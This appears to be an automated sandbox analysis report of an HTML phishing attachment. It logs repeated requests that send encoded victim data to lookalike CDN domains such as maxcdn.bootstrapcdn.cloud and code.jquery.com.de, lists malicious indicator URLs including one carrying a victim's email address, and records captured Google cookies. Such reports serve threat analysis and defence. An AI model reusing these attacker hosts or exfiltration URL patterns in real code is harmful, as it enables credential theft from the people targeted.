    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: November Draw Disbursed.htmlString found in binary or memory: https://descansonline.com/wp/b1.js
    Source: November Draw Disbursed.htmlString found in binary or memory: https://descansonline.com/wp/b1.php
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
    Source: unknownHTTPS traffic detected: 162.19.88.68:443 -> 192.168.2.3:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.172.153.55:443 -> 192.168.2.3:49743 version: TLS 1.2
    Source: classification engineClassification label: mal56.phis.winHTML@27/0@16/13
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1856,i,16127261416295333797,16450193774645569565,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\November Draw Disbursed.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown (2 identical entries)
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1856,i,16127261416295333797,16450193774645569565,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown (21 identical entries)
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdater
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
    MITRE ATT&CK Matrix (figures in parentheses are the counts the report attaches to matched techniques)

    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
    Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows)
    Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
    Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
    Defense Evasion: Masquerading (2); Process Injection (1); Obfuscated Files or Information; Binary Padding
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
    Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
    Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Ingress Tool Transfer (1)
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
    Impact: Modify System Partition; Device Lockout; Delete Device Data
No Antivirus matches (initial sample, dropped files, unpacked PE files)

Domains (Source | Detection | Scanner):
descansonline.com | 0% | Virustotal
i.postimg.cc | 0% | Virustotal
code.jquery.quest | 0% | Virustotal
maxcdn.bootstrapcdn.rest | 0% | Virustotal

URLs (Source | Detection | Scanner | Label):
https://maxcdn.bootstrapcdn.cloud/ndata/index.php?dt=wendy.lang@dmv.ca.gov | 0% | Avira URL Cloud | safe
https://descansonline.com/wp/b1.js | 0% | Avira URL Cloud | safe
https://maxcdn.bootstrapcdn.cloud/catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 | 0% | Avira URL Cloud | safe
https://maxcdn.bootstrapcdn.cloud/tkv/index.php?dt=QCPsVcn7rgD1hKIR25CTCLE0O | 0% | Avira URL Cloud | safe
https://maxcdn.bootstrapcdn.cloud/post/index.php?title=Sign%20in%20to%20your%20account&link=file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html&time=2022-11-29%2019:59:17&ip=102.129.143.49%20:%20Switzerland | 0% | Avira URL Cloud | safe
https://code.jquery.com.de/ip.php | 0% | Avira URL Cloud | safe
https://i.postimg.cc/jSY8DXQL/back.jpg | 0% | Avira URL Cloud | safe
https://code.jquery.quest/jquery-3.5.2.min.js | 0% | Avira URL Cloud | safe
https://code.jquery.com.de/jquery-3.5.2.min.js | 0% | Avira URL Cloud | safe
https://descansonline.com/wp/b1.php | 0% | Avira URL Cloud | safe
